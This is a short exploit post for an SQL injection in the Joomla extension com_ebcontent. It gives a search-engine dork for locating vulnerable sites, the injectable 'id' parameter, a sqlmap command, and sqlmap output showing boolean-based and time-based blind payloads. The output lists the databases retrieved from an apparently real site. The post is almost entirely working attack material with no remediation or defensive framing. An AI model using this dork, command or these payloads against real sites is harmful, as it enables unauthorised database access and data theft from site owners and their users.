Title: exploit joomla com_ebcontent SQL injection
Author: Đầu Lâu
Date:16/10/2015
Test on: kali linux
Hompage: dont have
Version: all version
Dork:
inurl:option=com_ebcontent
Vuln:
http://site.com/index.php?option=com_ebcontent&view=article&tmpl=component&id=sql injection&cid=9&print=
POC:
sqlmap -u "http://xxx/mma/index.php?option=com_ebcontent&view=article&id=37*&cid=29&Itemid=129&lang=vn" --dbs
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://xxx:80/mma/index.php?option=com_ebcontent&view=article&id=37' AND 7599=7599 AND 'gefD'='gefD&cid=29&Itemid=129&lang=vn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://xxx:80/mma/index.php?option=com_ebcontent&view=article&id=37' AND (SELECT * FROM (SELECT(SLEEP(5)))mbyz) AND 'dIwT'='dIwT&cid=29&Itemid=129&lang=vn
---
available databases [3]:
[*] ebrand_mma
[*] information_schema
[*] test